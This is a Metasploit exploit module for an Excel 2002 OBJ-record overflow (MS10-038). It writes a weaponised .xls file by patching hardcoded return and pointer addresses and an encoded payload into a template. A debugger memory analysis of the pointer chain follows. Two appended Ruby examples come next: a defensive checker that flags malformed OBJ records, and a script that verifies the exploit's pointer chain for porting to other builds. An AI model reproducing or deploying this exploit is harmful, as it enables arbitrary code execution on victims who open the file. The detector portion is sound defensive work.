##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS10-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",
      'Description'    => %q{
        This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.
        By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker
        can get control of the execution flow. This results in arbitrary code execution
        under the context of the user.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Joly',                               # Initial discovery
          'Shahin Ramezany <shahin[at]abysssec.com>',   # MOAUB 24 exploit and binary analysis
          'juan vazquez'                                # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2010-0822'],
          ['OSVDB', '65236'],
          ['BID', '40520'],
          ['MSB', 'MS10-038'],
          ['URL', 'http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/']
        ],
      'Payload'        =>
        {
          'Space' => 4000
        },
      'DefaultOptions' =>
        {
          'ExitFunction'          => 'process',
          'DisablePayloadHandler' => 'true'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            # This is the one that can be downloaded from MSDN
            'Microsoft Office Excel 2002 10.2614.2625 Service Pack 0 (Office XP) on Windows XP SP3',
            {
              'ftCmoReserved'  => 0x307d91ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data
              'CraftedPointer' => 0x307d91a6, # Ptr to PtrToRet in the stored contents on Excel .data
              'PtrToRet'       => 0x307d908e, # Ptr to Ret - 11Ch
              'Ret'            => 0x30006113  # call ecx from Excel.exe 10.0.2614.0
            }
          ],
          [
            'Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3',
            {
              'ftCmoReserved'  => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data
              'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data
              'PtrToRet'       => 0x307de48e, # Ptr to Ret - 11Ch
              'Ret'            => 0x300061a5  # call ecx from Excel.exe 10.0.6501.0
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 8 2010",
      'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The filename', 'msf.xls'])
      ], self.class)
  end

  def exploit
    # The malicious document is built by patching a pre-made template at
    # fixed byte offsets: the target-specific pointers go into the OBJ
    # record, the encoded payload replaces a 4000-byte region (the 'Space'
    # declared above), and the rest of the template is copied through.
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2010-0822.xls')
    f = File.open(path, 'rb')
    template = f.read
    f.close

    buf = ''
    buf << template[0..35016]
    buf << [target['ftCmoReserved']].pack('V')
    buf << template[35021..36549]
    buf << [target['PtrToRet']].pack('V')
    buf << [target.ret].pack('V')
    buf << template[36558..36559]
    buf << [target['CraftedPointer']].pack('V')
    buf << template[36564..36609]
    buf << [target['CraftedPointer']].pack('V') # Pass the MSO_804()
    buf << template[36614..36639]
    buf << payload.encoded                      # 4000 bytes: 36640..40639
    buf << template[40640..template.length]

    file_create(buf)
  end
end

=begin

Memory analysis on Office XP SP3 (target 1 above)

'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data
------------------------------------------------------------------------------------------
0:000> db 0x307de5ac
307de5ac  00 30 74 00 a6 e5 7d 30-4c 4c 00 55 6e 69 72 42  .0t...}0LL.UnirB
307de5bc  42 42 42 4c 00 48 50 44-6f 63 55 49 53 55 49 00  BBBL.HPDocUISUI.
307de5cc  54 72 75 65 00 52 65 73-6f 6c 75 74 69 6f 6e 00  True.Resolution.
307de5dc  36 30 30 64 70 69 a6 e5-7d 30 74 52 65 73 00 46  600dpi..}0tRes.F
307de5ec  61 6c 73 65 90 90 90 90-90 90 90 90 90 90 90 90  alse............
307de5fc  90 90 90 90 41 41 41 41-41 41 41 41 41 41 41 41  ....AAAAAAAAAAAA
307de60c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de61c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data
-----------------------------------------------------------------------------------
0:000> db 0x307de5a6
307de5a6  8e e4 7d 30 a5 61 00 30-74 00 a6 e5 7d 30 4c 4c  ..}0.a.0t...}0LL
307de5b6  00 55 6e 69 72 42 42 42-42 4c 00 48 50 44 6f 63  .UnirBBBBL.HPDoc
307de5c6  55 49 53 55 49 00 54 72-75 65 00 52 65 73 6f 6c  UISUI.True.Resol
307de5d6  75 74 69 6f 6e 00 36 30-30 64 70 69 [[a6 e5 7d 30]]*  ution.600dpi..}0
307de5e6  74 52 65 73 00 46 61 6c-73 65 90 90 90 90 90 90  tRes.False......
307de5f6  90 90 90 90 90 90 90 90-90 90 41 41 41 41 41 41  ..........AAAAAA
307de606  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de616  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

* => 0x307de5a6 + 0x3c => 0x307de5e2

'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch
---------------------------------------------
307de48e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de49e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4ae  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4be  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4ce  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4de  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4ee  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de4fe  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de50e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de51e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de52e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de53e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de54e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de55e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de56e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de57e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de58e  90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90  ................
307de59e  eb 60 6e 00 50 72 69 6e-8e e4 7d 30 [[a5 61 00 30]]*  .`n.Prin..}0.a.0
307de5ae  74 00 a6 e5 7d 30 4c 4c-00 55 6e 69 72 42 42 42  t...}0LL.UnirBBB
307de5be  42 4c 00 48 50 44 6f 63-55 49 53 55 49 00 54 72  BL.HPDocUISUI.Tr
307de5ce  75 65 00 52 65 73 6f 6c-75 74 69 6f 6e 00 36 30  ue.Resolution.60
307de5de  30 64 70 69 a6 e5 7d 30-74 52 65 73 00 46 61 6c  0dpi..}0tRes.Fal
307de5ee  73 65 90 90 90 90 90 90-90 90 90 90 90 90 90 90  se..............
307de5fe  90 90 41 41 41 41 41 41-41 41 41 41 41 41 41 41  ..AAAAAAAAAAAAAA
307de60e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de61e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de62e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de63e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de64e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de65e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de66e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
307de67e  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA

* 0x307de48e + 0x11c => 0x307de5aa (the marked dword, i.e. Ret)

'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0
----------------------------------------------------------
EXCEL!Ordinal41+0x61a5:
300061a5 ffd1            call    ecx
300061a7 e00b            loopne  EXCEL!Ordinal41+0x61b4 (300061b4)
300061a9 c1536689        rcl     dword ptr [ebx+66h],89h
300061ad 46              inc     esi
300061ae 2a8d8574ffff    sub     cl,byte ptr [ebp-8B7Bh]
300061b4 ff5068          call    dword ptr [eax+68h]
300061b7 1200            adc     al,byte ptr [eax]
300061b9 0400            add     al,0

=end
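The module above patches pointers into a malformed OBJ (recType 0x5D) record, and the target key name `ftCmoReserved` indicates that one of them lands in a reserved field of the record's ftCmo subrecord. The following is an added example, not code from the Metasploit module or from the original researchers: a minimal BIFF8 record walker in Ruby that finds OBJ records in a raw worksheet stream, parses the ftCmo subrecord (layout per MS-XLS: ft, cb, ot, id, flags, then three reserved dwords that must be zero) and flags non-zero reserved fields and subrecords whose declared length overruns the record. The sample stream is constructed inline; the hostile value 0x307de5ac is simply the SP3 target constant from the module, not bytes from CVE-2010-0822.xls.

```ruby
# Added example: BIFF8 OBJ-record checker (not part of the Metasploit module).
# Record and subrecord layouts follow MS-XLS; the sample stream is constructed.

REC_BOF = 0x0809
REC_EOF = 0x000A
REC_OBJ = 0x005D   # the record type the exploit malforms
FT_END  = 0x0000
FT_CMO  = 0x0015   # common object data, must be the first subrecord of an OBJ

# Yield [recType, data, offset] for every record in a raw BIFF stream.
def biff_records(stream)
  return enum_for(:biff_records, stream) unless block_given?
  pos = 0
  while pos + 4 <= stream.bytesize
    rec_type, rec_len = stream[pos, 4].unpack('vv')
    data = stream[pos + 4, rec_len] || ''
    raise "truncated record 0x%04x at %d" % [rec_type, pos] if data.bytesize < rec_len
    yield rec_type, data, pos
    pos += 4 + rec_len
  end
end

# Walk the ft* subrecords of one OBJ record body. Returns [ftCmo fields or
# nil, array of findings]; an empty findings array means the record is clean.
def inspect_obj(data)
  findings = []
  cmo = nil
  pos = 0
  while pos + 4 <= data.bytesize
    ft, cb = data[pos, 4].unpack('vv')
    body = data[pos + 4, cb] || ''
    if body.bytesize < cb
      findings << "subrecord ft=0x%02x declares cb=%d but only %d bytes remain" % [ft, cb, body.bytesize]
      break
    end
    if ft == FT_CMO
      findings << "ftCmo is not the first subrecord" if pos != 0
      if cb != 0x12
        findings << "ftCmo cb=0x%02x, expected 0x12" % cb
      else
        ot, id, flags, u1, u2, u3 = body.unpack('vvvVVV')
        cmo = { ot: ot, id: id, flags: flags, reserved: [u1, u2, u3] }
        [u1, u2, u3].each_with_index do |v, i|
          # Reserved fields are where a planted pointer would sit.
          findings << "ftCmo unused%d = 0x%08x (should be 0)" % [i + 1, v] if v != 0
        end
      end
    end
    pos += 4 + cb
    break if ft == FT_END
  end
  findings << "ftCmo subrecord missing" if cmo.nil?
  [cmo, findings]
end

# Map of stream offset => findings for every OBJ record that looks malformed.
def suspicious_obj_records(stream)
  out = {}
  biff_records(stream).each do |rec_type, data, off|
    next unless rec_type == REC_OBJ
    _cmo, findings = inspect_obj(data)
    out[off] = findings unless findings.empty?
  end
  out
end

# Helpers to build the constructed sample stream.
def ft_sub(ft, body)        = [ft, body.bytesize].pack('vv') + body
def biff_record(type, data) = [type, data.bytesize].pack('vv') + data

BENIGN_CMO  = ft_sub(FT_CMO, [0x08, 1, 0x4011, 0, 0, 0].pack('vvvVVV'))           # ot=8: picture
HOSTILE_CMO = ft_sub(FT_CMO, [0x08, 2, 0x4011, 0x307de5ac, 0, 0].pack('vvvVVV'))  # pointer in unused1
FT_END_SUB  = ft_sub(FT_END, '')

SAMPLE_STREAM =
  biff_record(REC_BOF, [0x0600, 0x0010, 0, 0, 0, 0].pack('vvvvVV')) +  # offset 0, 20 bytes
  biff_record(REC_OBJ, BENIGN_CMO + FT_END_SUB) +                      # offset 20, clean
  biff_record(REC_OBJ, HOSTILE_CMO + FT_END_SUB) +                     # offset 50, planted pointer
  biff_record(REC_OBJ, HOSTILE_CMO + [FT_END, 0x40].pack('vv')) +      # offset 80, ftEnd overruns
  biff_record(REC_EOF, '')

if __FILE__ == $0
  suspicious_obj_records(SAMPLE_STREAM).each do |off, findings|
    puts "OBJ record at stream offset #{off}:"
    findings.each { |f| puts "  - #{f}" }
  end
end
```

To run this against a real .xls the Workbook stream must first be pulled out of the OLE2 compound file (for example with a CFB/OLE library); that step is assumed and not shown. Note that the check is structural only: a non-zero reserved dword is a strong hint but not proof, so treat a hit as a reason to look at the record in a debugger, not as a verdict.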
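The memory analysis block expresses the four target constants as a chain of pointers into Excel's .data section: ftCmoReserved points 4 bytes before the stored CraftedPointer, CraftedPointer points at PtrToRet, PtrToRet is the address of the stored Ret minus 0x11c, and CraftedPointer+0x3c holds CraftedPointer again. The following is an added example, not part of the module or the original analysis: it rebuilds the dumped region as a byte image (the bytes from 0x307de59e onward are transcribed from the `db` rows above, preceded by the 0x110-byte 0x90 sled shown) and checks every link of that chain for the SP3 target. The link semantics are inferred from the comments in the target hash and the marked dwords in the dump, so they are an assumption of this example; the structure is what one would reuse when extracting constants for a new Excel build.

```ruby
# Added example: verify the SP3 target's pointer chain against the dump
# (not part of the Metasploit module). Bytes transcribed from the dump above.

IMAGE_BASE = 0x307de48e                # 'PtrToRet' for the SP3 target
IMAGE = ("\x90".b * 0x110) + [         # 0x307de48e..0x307de59d: NOP sled
  "eb606e005072696e8ee47d30a5610030",  # 307de59e
  "7400a6e57d304c4c00556e6972424242",  # 307de5ae
  "424c004850446f635549535549005472",  # 307de5be
  "7565005265736f6c7574696f6e003630",  # 307de5ce
  "30647069a6e57d30745265730046616c",  # 307de5de
  "7365" + "90" * 14,                  # 307de5ee
].join.then { |hex| [hex].pack('H*') }

# Little-endian dword read, bounds-checked against the image.
def read32(addr)
  off = addr - IMAGE_BASE
  raise "address 0x%08x outside image" % addr if off < 0 || off + 4 > IMAGE.bytesize
  IMAGE[off, 4].unpack1('V')
end

SP3_TARGET = {
  'ftCmoReserved'  => 0x307de5ac,
  'CraftedPointer' => 0x307de5a6,
  'PtrToRet'       => 0x307de48e,
  'Ret'            => 0x300061a5,
}

# Each link: name => [expected, observed]. Offsets 4, 0x11c and 0x3c are the
# ones the analysis block annotates (assumed semantics, see lead-in).
def verify_chain(t)
  {
    'ftCmoReserved+4 -> CraftedPointer'     => [t['CraftedPointer'], read32(t['ftCmoReserved'] + 4)],
    'CraftedPointer -> PtrToRet'            => [t['PtrToRet'],       read32(t['CraftedPointer'])],
    'PtrToRet+0x11c -> Ret'                 => [t['Ret'],            read32(t['PtrToRet'] + 0x11c)],
    'CraftedPointer+0x3c -> CraftedPointer' => [t['CraftedPointer'], read32(t['CraftedPointer'] + 0x3c)],
  }
end

def chain_ok?(t)
  verify_chain(t).values.all? { |expected, observed| expected == observed }
end

if __FILE__ == $0
  verify_chain(SP3_TARGET).each do |name, (expected, observed)|
    status = expected == observed ? 'ok' : 'MISMATCH'
    puts "%-40s expected 0x%08x observed 0x%08x  %s" % [name, expected, observed, status]
  end
end
```

A practical use: when the SP0 constants (0x307d91ac and friends) are fed to `read32` they fall outside this image and the check raises, which is the right behaviour, since that target needs its own dump. A failed link, rather than a crash, is what you would see if one of the four constants were mis-copied by a few bytes.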